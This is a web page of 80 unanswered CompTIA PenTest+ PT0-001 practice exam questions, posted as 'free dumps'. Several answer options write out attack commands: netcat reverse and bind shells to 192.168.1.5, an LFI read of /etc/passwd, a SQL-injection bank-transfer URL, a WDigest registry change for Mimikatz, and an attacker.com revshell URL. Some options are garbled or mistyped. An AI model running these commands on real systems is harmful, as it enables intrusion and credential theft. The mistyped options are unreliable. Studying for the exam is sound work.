CompTIA PenTest+ Practice Questions PT0-001 Free Dumps

Eleanor2024-10-14T15:43:35+00:00

By Eleanor CompTIA, CompTIA PenTest+

When introduced the “Registrable CompTIA Certification Exams [2022]“, all can know that PT0-001 exam is still available online for earning CompTIA PenTest+ certification. It will be retired on April 26, 2022, so not much time to allow candidates to register and take it. Therefore, if want to pass PT0-001 exam in a short time, it is recommended to read PT0-001 CompTIA PenTest+ practice questions for preparation. PT0-001 free dumps are below for reading and testing now.

CompTIA PenTest+ PT0-001 Free Dumps

Page 1 of 8

1. A penetration tester observes that several high numbered ports are listening on a public web server. However, the system owner says the application only uses port 443 .

Which of the following would be BEST to recommend?

Transition the application to another port

Filter port 443 to specific IP addresses

Implement a web application firewall

Disable unneeded services.

2. Which of the following documents BEST describes the manner in which a security assessment will be conducted?

BIA

SOW

SLA

MSA

3. A penetration tester is utilizing social media to gather information about employees at a company. The tester has created a list of popular words used in employee profile s.

For which of the following types of attack would this information be used?

Exploit chaining

Session hijacking

Dictionary

Karma

4. An organization has requested that a penetration test be performed to determine if it is possible for an attacker to gain a foothold on the organization's server segment During the assessment, the penetration tester identifies tools that appear to have been left behind by a prior attack.

Which of the following actions should the penetration tester take?

Attempt to use the remnant tools to achieve persistence

Document the presence of the left-behind tools in the report and proceed with the test

Remove the tools from the affected systems before continuing on with the test

Discontinue further testing and report the situation to management

5. A penetration tester is attempting to capture a handshake between a client and an access point by monitoring a WPA2-PSK secured wireless network. The tester is monitoring the correct channel for the identified network, but has been unsuccessful in capturing a handshake.

Given the scenario, which of the following attacks would BEST assist the tester in obtaining this handshake?

Karma attack

Deauthentication attack

Fragmentation attack

SSDI broadcast flood

6. While conducting information gathering, a penetration tester is trying to identify Windows hosts .

Which of the following characteristics would be BEST to use for fingerprinting?

The system responds with a MAC address that begins with 00:0A:3

The system responds with port 22 open.

The system responds with a TTL of 128.

The system responds with a TCP window size of 5840.

7. When negotiating a penetration testing contract with a prospective client, which of the following disclaimers should be included in order to mitigate liability in case of a future breach of the client’s systems?

The proposed mitigations and remediations in the final report do not include a cost-benefit analysis.

The NDA protects the consulting firm from future liabilities in the event of a breach.

The assessment reviewed the cyber key terrain and most critical assets of the client’s network.

The penetration test is based on the state of the system and its configuration at the time of assessment.

8. A security team is switching firewall vendors. The director of security wants to scope a penetration test to satisfy requirements to perform the test after major architectural changes .

Which of the following is the BEST way to approach the project?

Design a penetration test approach, focusing on publicly released firewall DoS vulnerabilities.

Review the firewall configuration, followed by a targeted attack by a read team.

Perform a discovery scan to identify changes in the network.

Focus on an objective-based approach to assess network assets with a red team.

9. Given the following Python code:

a = 'abcdefghijklmnop'

a[::2]

Which of the following will result?

adgjmp

pnlhfdb

acegikmo

10. A penetration tester runs a script that queries the domain controller for user service principal names .

Which of the following techniques is MOST likely being attempted?

LSASS credential extraction

Cpassword

Cleartext credentials in LDAP

Kerberoasting

Page 2 of 8

11. A tester has captured a NetNTLMv2 hash using Responder.

Which of the following commands will allow the tester to crack the hash using a mask attack?

hashcat -m 5600 -r rulea/beat64.rule hash.txt wordliat.txt

hashcax -m 500 hash.txt

hashc&t -m 5600 -a 3 haah.txt ?a?a?a?a?a?a?a?a

hashcat -m 5600 -o reaulta.txt hash.txt wordliat.txt

12. Which of the following reasons does penetration tester needs to have a customer's point-of -contact information available at all time? (Select THREE).

To report indicators of compromise

To report findings that cannot be exploited

To report critical findings

To report the latest published exploits

To update payment information

To report a server that becomes unresponsive

To update the statement o( work

To report a cracked password

13. A penetration tester has successfully deployed an evil twin and is starting to see some victim traffic. The next step the penetration tester wants to take is to capture all the victim web traffic unencrypted .

Which of the following would BEST meet this goal?

Perform an HTTP downgrade attack.

Harvest the user credentials to decrypt traffic.

Perform an MITM attack.

Implement a CA attack by impersonating trusted CAs.

14. A penetration tester is exploiting the use of default public and private community strings.

Which of the following protocols is being exploited?

SMTP

DNS

SNMP

HTTP

15. During post-exploitation, a tester identifies that only system binaries will pass an egress filter and store a file with the following command:

c: creditcards.db>c:winitsystem32calc.exe:creditcards.db

Which of the following file system vulnerabilities does this command take advantage of?

Hierarchical file system

Alternate data streams

Backdoor success

Extended file system

16. During a penetration test, a tester runs a phishing campaign and receives a shell from an internal PC running Windows 10 OS. The tester wants to perform credential harvesting with Mimikatz.

Which of the following registry changes would allow for credential caching in memory?

reg add HKLMSystemControlSet002ControlSecurityProvidersWDigest /v userLogoCredential /t REG_DWORD /d 0

reg add HKCUSystemCurrentControlSetControlSecurityProvidersWDigest /v userLogoCredential /t REG_DWORD /d 1

reg add HKLMSoftwareCurrentControlSetControlSecurityProvidersWDigest /v userLogoCredential /t REG_DWORD /d 1

reg add HKLMSystemCurrentControlSetControlSecurityProvidersWDigest /v userLogoCredential /t REG_DWORD /d 1

17. DRAG DROP

Instructions:

Analyze the code segments to determine which sections are needed to complete a port scanning script.

Drag the appropriate elements into the correct locations to complete the script.

If at any time you would like to bring back the initial state of the simulation, please click the reset all button.

During a penetration test, you gain access to a system with a limited user interface. This machine appears to have access to an isolated network that you would like to port scan.

18. A constant wants to scan all the TCP Pots on an identified device .

Which of the following Nmap switches will complete this task?

-p-

-p ALX,

-p 1-65534

-port 1-65534

19. Which of the following tools can be used to perform a basic remote vulnerability scan of a website's configuration?

Mimikatz

BeEF

Nikto

Patator

20. Which of the following tools would a penetration tester leverage to conduct OSINT? (Select TWO).

Shodan

SET

BeEF

Wireshark

Maltego

Dynamo

Page 3 of 8

21. HOTSPOT

Instructions:

Given the following attack signatures, determine the attack type, and then identify the associated remediation to prevent the attack in the future.

If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

You are a security analyst tasked with hardening a web server.

You have been given a list of HTTP payloads that were flagged as malicious.

22. A penetration tester runs the following on a machine:

Which of the following will be returned?

23. The results of a basic compliance scan show a subset of assets on a network. This data differs from what is shown on the network architecture diagram, which was supplied at the beginning of the test .

Which of the following are the MOST likely causes for this difference? (Select TWO)

Storage access

Limited network access

Misconfigured DHCP server

Incorrect credentials

Network access controls

24. A penetration tester is performing a code review .

Which of the following testing techniques is being performed?

Dynamic analysis

Fuzzing analysis

Static analysis

Run-time analysis

25. A web server is running PHP, and a penetration tester is using LFI to execute commands by passing parameters through the URL. This is possible because server logs were poisoned to execute the PHP system ( ) function .

Which of the following would retrieve the contents of the passwd file?

''&CMD_cat /etc/passwd--&id-34''

''&CMD=cat / etc/passwd%&id= 34''

''&CMD=cat ../../../../etc/passwd7id=34'

''&system(CMD) ''cat /etc/passed&id=34''

26. A consultant is identifying versions of Windows operating systems on a network.

Which of the following Nmap commands should the consultant run?

nmap -T4 -v -sU -iL /tmp/list.txt -Pn ―script smb-system-info

nmap -T4 -v -iL /tmp/list .txt -Pn ―script smb-os-disccvery

nmap -T4 -v -6 -iL /tmp/liat.txt -Pn ―script smb-os-discovery -p 135-139

nmap -T4 -v ―script smb-system-info 192.163.1.0/24

27. A penetration tester is testing a web application and is logged in as a lower-privileged user. The tester runs arbitrary JavaScript within an application, which sends an XMLHttpRequest, resulting in exploiting features to which only an administrator should have access .

Which of the following controls would BEST mitigate the vulnerability?

Implement authorization checks.

Sanitize all the user input.

Prevent directory traversal.

Add client-side security controls

28. A consultant is performing a social engineering attack against a client. The consultant was able to collect a number of usernames and passwords using a phishing campaign. The consultant is given credentials to log on to various employees email accounts.

Given the findings, which of the following should the consultant recommend be implemented?

Strong password policy

Password encryption

Email system hardening

Two-factor authentication

29. A penetration tester is performing ARP spoofing against a switch .

Which of the following should the penetration tester spoof to get the MOST information?

MAC address of the client

MAC address of the domain controller

MAC address of the web server

MAC address of the gateway

30. Joe, an attacker, intends to transfer funds discreetly from a victim’s account to his own .

Which of the following URLs can he use to accomplish this attack?

https://testbank.com/BankingApp/AC

aspx?CustID=435345&accountType=F&action-ACHTransfer&senderID=654846&notify=False&creditaccount=’OR 1=1 AND select username from testbank.custinfo where username like ‘Joe’&amount=200

https://testbank.com/BankingApp/AC

aspx?CustID=435345&accountType=F&action-ACHTransfer&senderID=654846&notify=False&creditaccount=’OR 1=1 AND select username from testbank.custinfo where username like ‘Joe’ &amount=200

https://testbank.com/BankingApp/AC

aspx?CustID=435345&accountType=F&action-ACHTransfer&senderID=654846&notify=True&creditaccount=’OR 1=1 AND select username from testbank.custinfo where username like ‘Joe’ &amount=200

https://testbank.com/BankingApp/AC

aspx?CustID=435345&accountType=F&action-ACHTransfer&senderID=654846&notify=True&creditaccount=’AND 1=1 AND select username from testbank.custinfo where username like ‘Joe’ &amount=200

Page 4 of 8

31. A company contracted a firm specializing in penetration testing to assess the security of a core business application. The company provided the firm with a copy of the Java bytecode .

Which of the following steps must the firm take before it can run a static code analyzer?

Run the application through a dynamic code analyzer.

Employ a fuzzing utility.

Decompile the application.

Check memory allocations.

32. A penetration tester has been assigned to perform an external penetration assessment of a company .

Which of the following steps would BEST help with the passive-information-gathering process? (Choose two.)

Wait outside of the company’s building and attempt to tailgate behind an employee.

Perform a vulnerability scan against the company’s external netblock, identify exploitable vulnerabilities, and attempt to gain access.

Use domain and IP registry websites to identify the company’s external netblocks and external facing applications.

Search social media for information technology employees who post information about the technologies they work with.

Identify the company’s external facing webmail application, enumerate user accounts and attempt password guessing to gain access.

33. A penetration tester is designing a phishing campaign and wants to build list of users (or the target organization .

Which of the following techniques would be the MOST appropriate? (Select TWO)

Query an Internet WHOIS database.

Search posted job listings.

Scrape the company website.

Harvest users from social networking sites.

Socially engineer the corporate call center.

34. A penetration tester successfully exploits a Windows host and dumps the hashes.

Which of the following hashes can the penetration tester use to perform a pass-the-hash attack?

A)

Option A

Option B

Option C

Option D

35. Which of the following commands starts the Metasploit database?

msfconsole

workspace

msfvenom

db_init

db_connect

36. Which of the following commands will allow a tester to enumerate potential unquoted services paths on a host?

wmic environment get name, variablevalue, username / findstr /i “Path” | findstr /i “service”

wmic service get /format:hform > c:tempservices.html

wmic startup get caption, location, command | findstr /i “service” | findstr /v /i “%”

wmic service get name, displayname, patchname, startmode | findstr /i “auto” | findstr /i /v “c:windows\” | findstr /i /v “””

37. A company planned for and secured the budget to hire a consultant to perform a web application penetration test.

Upon discovered vulnerabilities, the company asked the consultant to perform the following tasks:

• Code review

• Updates to firewall setting

Scope creep

Post-mortem review

Risk acceptance

Threat prevention

38. A penetration tester is preparing for an assessment of a web server's security, which is used to host several sensitive web applications. The web server is PKI protected, and the penetration tester reviews the certificate presented by the server during the SSL handshake .

Which of the following certificate fields or extensions would be of MOST use to the penetration tester during an assessment?

Subject key identifier

Subject alternative name

Authority information access

Service principal name

39. An internal network penetration test is conducted against a network that is protected by an unknown NAC system In an effort to bypass the NAC restrictions the penetration tester spoofs the MAC address and hostname of an authorized system.

Which of the following devices if impersonated would be MOST likely to provide the tester with network access?

Network-attached printer

Power-over-Ethernet injector

User workstation

Wireless router

40. A penetration tester locates a few unquoted service paths during an engagement .

Which of the following can the tester attempt to do with these?

Attempt to crack the service account passwords.

Attempt DLL hijacking attacks.

Attempt to locate weak file and folder permissions.

Attempt privilege escalation attacks.

Page 5 of 8

41. A penetration tester is testing a banking application and uncovers a vulnerability. The tester is logged in as a non-privileged user who should have no access to any data.

Given the data below from the web interception proxy

Request

POST /Bank/Tax/RTSdocuments/ HTTP 1.1

Host: test.com

Accept: text/html; application/xhtml+xml

Referrer: https://www.test.com/Bank/Tax/RTSdocuments/

Cookie: PHPSESSIONID: ;

Content-Type: application/form-data;

Response

403 Forbidden

<tr>

<td> Error:</td></tr>

<tr><td> Insufficient Privileges to view the data. </td></tr>

Displaying 1-10 of 105 records

Which of the following types of vulnerabilities is being exploited?

Forced browsing vulnerability

Parameter pollution vulnerability

File upload vulnerability

Cookie enumeration

42. A security assessor is attempting to craft specialized XML files to test the security of the parsing functions during ingest into a Windows application.

Before beginning to test the application, which of the following should the assessor request from the organization?

Sample SOAP messages

The REST API documentation

A protocol fuzzing utility

An applicable XSD file

43. When performing compliance-based assessments, which of the following is the MOST important Key consideration?

Additional rate

Company policy

Impact tolerance

Industry type

44. A penetration tester has been hired to perform a penetration test for an organization .

Which of the following is indicative of an error-based SQL injection attack?

a=1 or 1CC

1=1 or bCC

1=1 or 2CC

1=1 or aCC

45. While monitoring WAF logs, a security analyst discovers a successful attack against the following URL: https://example.com/index.php?Phone=http://attacker.com/badstuffhappens/revshell.php

Which of the following remediation steps should be taken to prevent this type of attack?

Implement a blacklist.

Block URL redirections.

Double URL encode the parameters.

Stop external calls from the application.

46. A penetration tester is assessing the security of a web form for a client and enters “;id” in one of the fields.

The penetration tester observes the following response:

Based on the response, which of the following vulnerabilities exists?

SQL injection

Session hijacking

Command injection

XSS/XSRF

47. Which of the following BEST describes why an MSA is helpful?

It contractually binds both parties to not disclose vulnerabilities.

It reduces potential for scope creep.

It clarifies the business arrangement by agreeing to specific terms.

It defines the timelines for the penetration test.

48. 1.A penetration tester has successfully exploited a Windows host with low privileges and found directories with the following permissions:

Which of the following should be performed to escalate the privileges?

Kerberoasting

Retrieval of the SAM database

Migration of the shell to another process

Writable services

49. A penetration tester ran the following Nmap scan on a computer:

nmap -aV 192.168.1.5

The organization said it had disabled Telnet from its environment. However, the results of the Nmap scan show port 22 as closed and port 23 as open to SSH .

Which of the following is the BEST explanation for what happened?

The organization failed to disable Telnet.

Nmap results contain a false positive for port 23.

Port 22 was filtered.

The service is running on a non-standard port.

50. A penetration tester is performing a black-box test of a client web application, and the scan host is unable to access it. The client has sent screenshots showing the system is functioning correctly .

Which of the following is MOST likely the issue?

The penetration tester was not provided with a WSDL file.

The penetration tester needs an OAuth bearer token.

The tester has provided an incorrect password for the application.

An IPS/WAF whitelist is in place to protect the environment.

Page 6 of 8

51. A penetration tester notices that the X-Frame-Optjons header on a web application is not set .

Which of the following would a malicious actor do to exploit this configuration setting?

Use path modification to escape the application's framework.

Create a frame that overlays the application.

Inject a malicious iframe containing JavaScript.

Pass an iframe attribute that is malicious.

52. During a web application assessment, a penetration tester discovers that arbitrary commands can be executed on the server. Wanting to take this attack one step further, the penetration tester begins to explore ways to gain a reverse shell back to the attacking machine at 192.168.1.5 .

Which of the following are possible ways to do so? (Select TWO)

nc 192.168.1.5 44444

nc -nlvp 4444 -e /bin/sh

rm /tmp/f; mkfifo /tmp/f; cat /tmp/f| /bin/sh CI 2>&1|nc 192.168.1.5 44444>/tmp /f

nc -e /bin/sh 192.168.1.5 4444

rm /tmp/f; mkfifo /tmp/f; cat /tmp/f| /bin/sh CI 2>&1|nc 192.168.1.5 444444>/tmp /f

rm /tmp/f; mkfifo /tmp/f; cat /tmp/f| /bin/sh CI 2>&1|nc 192.168.5.1 44444>/tmp /f

53. Which of the following CPU registers does the penetration tester need to overwrite in order to exploit a simple buffer overflow?

Stack pointer register

Index pointer register

Stack base pointer

Destination index register

54. CORRECT TEXT

You are a penetration tester running port scans on a server.

INSTRUCTIONS

Part1: Given the output, construct the command that was used to generate this output from the available options.

Part2: Once the command is appropriately constructed, use the given output to identify the potential attack vectors that should be investigated further.

If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

Part1

Part2

55. A penetration tester has compromised a host .

Which of the following would be the correct syntax to create a Netcat listener on the device?

nc -lvp 4444 /bin/bash

nc -vp 4444 /bin/bash

nc -p 4444 /bin/bash

nc -lp 4444 Ce /bin/bash

56. Which of the following is an example of a spear phishing attack?

Targeting an executive with an SMS attack

Targeting a specific team with an email attack

Targeting random users with a USB key drop

Targeting an organization with a watering hole attack

57. A penetration tester is required to exploit a WPS implementation weakness .

Which of the following tools will perform the attack?

Karma

Kismet

Pixie

NetStumbler

58. A penetration tester must assess a web service .

Which of the following should the tester request during the scoping phase?

XSD

After-hours contact escalation

WSDLfile

SOAP project file

59. An attacker is attempting to gain unauthorized access to a WiR network that uses WPA2-PSK.

Which of the following attack vectors would the attacker MOST likely use?

Capture a three-way handshake and crack it

Capture a mobile device and crack its encryption

Create a rogue wireless access point

Capture a four-way handshake and crack it

60. A penetration tester delivers a web application vulnerability scan report to a client. The penetration tester rates a vulnerability as medium severity. The same vulnerability was reported as a critical severity finding on the previous report .

Which of the following is the MOST likely reason for the reduced severity?

The client has applied a hot fix without updating the version.

The threat landscape has significantly changed.

The client has updated their codebase with new features.

Thera are currently no known exploits for this vulnerability.

Page 7 of 8

61. Which of the following describe a susceptibility present in Android-based commercial mobile devices when organizations are not employing MDM services? (Choose two.)

Configurations are user-customizable.

End users have root access to devices by default.

Push notification services require Internet access.

Unsigned apps can be installed.

The default device log facility does not record system actions.

IPSec VPNs are not configurable.

62. A penetration tester has been asked to conduct OS fingering with Nmap using a company-provided text file that contains a list of IP addresses .

Which of the following are needed to conduct this scan? (Choose two.)

-O

-iL

-sV

-sS

-oN

-oX

63. A company received a report with the following finding . While on the internal network the penetration tester was able to successfully capture SMB broadcasted user ID and password information on the network and decode this information. This allowed the penetration tester to then join their own computer to the ABC domain.

Which of the following remediation’s are appropriate for the reported findings'? (Select TWO)

Set the Schedule Task Service from Automatic to Disabled

Enable network-level authentication

Remove the ability from Domain Users to join domain computers to the network

Set the netlogon service from Automatic to Disabled

Set up a SIEM alert to monitor Domain joined machines

Set "Digitally sign network communications" to Always

64. After gaining initial low-privilege access to a Linux system, a penetration tester identifies an interesting binary in a user’s folder titled “changepass”

-sr Cxr -x 1 root root 6443 Oct 18 2017 /home/user/changepass

Using “strings” to print ASCII printable characters from changepass, the tester notes the following:

$ strings changepass

Exit

setuid

strmp

GLINC _2.0

ENV_PATH

%s/changepw

malloc

strlen

Given this information, which of the following is the MOST likely path of exploitation to achieve root privileges on the machines?

Copy changepass to a writable directory and export the ENV_PATH environmental variable to the path of a token-stealing binary titled changepw. Then run changepass

Create a copy of changepass in the same directory, naming it changpw. Export the ENV_PATH environmental variable to the path “/home/user’. Then run changepass

Export the ENV_PATH environmental variable to the path of a writable directory that contains a token-stealing binary title changepw

Run changepass within the current directory with sudo after exporting the ENV_PATH environmental variable to the path of ‘/usr/local/bin’

65. A penetration tester is required to perform OSINT on staff at a target company after completing the infrastructure aspect .

Which of the following would be the BEST step for the penetration tester to take?

Obtain staff information by calling the company and using social engineering techniques.

Visit the client and use impersonation to obtain information from staff.

Send spoofed emails to staff to see if staff will respond with sensitive information.

Search the Internet for information on staff such as social networking sites.

66. An engineer, who is conducting a penetration test for a web application, discovers the user login process sends from field data using the HTTP GET method.

To mitigate the risk of exposing sensitive information, the form should be sent using an:

HTTP POST method.

HTTP OPTIONS method.

HTTP PUT method.

HTTP TRACE method.

67. A penetration tester has access to a local machine running Linux, but the account has limited privileges .

Which of the following types of files could the tester BEST use for privilege escalation?

Binaries stored in /usr/bin

Files with permission 4xxx

Files stored in /root directory

Files with the wrong ACL rules configured

68. A penetration tester executes the following commands:

C:>%userprofile%jtr.exe

This program has been blocked by group policy

C:> accesschk.exe -w -s -q -u Users C:Windows

rw C:WindowsTracing

C:>copy %userprofile%jtr.exe C:WindowsTracing

C:WindowsTracingjtr.exe

jtr version 3.2…

jtr>

Which of the following is a local host vulnerability that the attacker is exploiting?

Insecure file permissions

Application Whitelisting

Shell escape

Writable service

69. Joe, a penetration tester, has received basic account credentials and logged into a Windows system.

To escalate his privilege, from which of the following places is he using Mimikatz to pull credentials?

LSASS

SAM database

Active Directory

Registry

70. A penetration tester was able to retrieve the initial VPN user domain credentials by phishing a member of the IT department. Afterward, the penetration tester obtained hashes over the VPN and easily cracked them using a dictionary attack.

Which of the following remediation steps should be recommended? (Select THREE)

Mandate all employees take security awareness training

Implement two-factor authentication for remote access

Install an intrusion prevention system

Increase password complexity requirements

Install a security information event monitoring solution.

Prevent members of the IT department from interactively logging in as administrators

Upgrade the cipher suite used for the VPN solution

Page 8 of 8

71. A client needs to be PCI compliant and has external-facing web servers .

Which of the following CVSS vulnerability scores would automatically bring the client out of compliance standards such as PCI 3.x?

2.9

3.0

4.0

5.9

72. A penetration tester, who is not on the client’s network. is using Nmap to scan the network for hosts that are in scope.

The penetration tester is not receiving any response on the command: nmap 100.100/1/0-125

Which of the following commands would be BEST to return results?

nmap -Pn -sT 100.100.1.0-125

nmap -sF -p 100.100.1.0-125

nmap -sV -oA output 100.100.10-125

nmap 100.100.1.0-125 -T4

73. Which of the following types of physical security attacks does a mantrap mitigate-?

Lock picking

Impersonation

Shoulder surfing

Tailgating

74. A penetration tester has obtained access to an IP network subnet that contains ICS equipment intercommunication .

Which of the following attacks is MOST likely to succeed in creating a physical effect?

DNS cache poisoning

Record and replay

Supervisory server SMB

Blind SQL injection

75. In which of the following scenarios would a tester perform a Kerberoasting attack?

The tester has compromised a Windows device and dumps the LSA secrets.

The tester needs to retrieve the SAM database and crack the password hashes.

The tester has compromised a limited-privilege user and needs to target other accounts for lateral movement.

The tester has compromised an account and needs to dump hashes and plaintext passwords from the system.

76. A penetration tester has compromised a system and wishes to connect to a port on it from the attacking machine to control the system.

Which of the following commands should the tester run on the compromised system?

nc looalhot 4423

nc -nvlp 4423 -« /bin/bash

nc 10.0.0.1 4423

nc 127.0.0.1 4423 -e /bin/bash

77. CORRECT TEXT

You are a penetration tester reviewing a client’s website through a web browser.

INSTRUCTIONS

Review all components of the website through the browser to determine if vulnerabilities are present.

Remediate ONLY the highest vulnerability from either the certificate, source, or cookies.

If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

78. A vulnerability scan identifies that an SSL certificate does not match the hostname; however, the client disputes the finding .

Which of the following techniques can the penetration tester perform to adjudicate the validity of the findings?

Ensure the scanner can make outbound DNS requests.

Ensure the scanner is configured to perform ARP resolution.

Ensure the scanner is configured to analyze IP hosts.

Ensure the scanner has the proper plug -ins loaded.

79. DRAG DROP

Instructions:

Analyze the code segments to determine which sections are needed to complete a port scanning script.

Drag the appropriate elements into the correct locations to complete the script.

If at any time you would like to bring back the initial state of the simulation, please click the reset all button.

During a penetration test, you gain access to a system with a limited user interface. This machine appears to have access to an isolated network that you would like to port scan.

80. A penetration tester is outside of an organization's network and is attempting to redirect users to a fake password reset website hosted on the penetration tester's box .

Which of the following techniques is suitable to attempt this?

Employ NBNS poisoning.

Perform ARP spoofing.

Conduct a phishing campaign.

Use an SSL downgrade attack.

CompTIA PenTest+ Practice Questions PT0-001 Free Dumps

CompTIA PenTest+ Practice Questions PT0-001 Free Dumps

CompTIA PenTest+ PT0-001 Free Dumps

Share this post

Author

Related Posts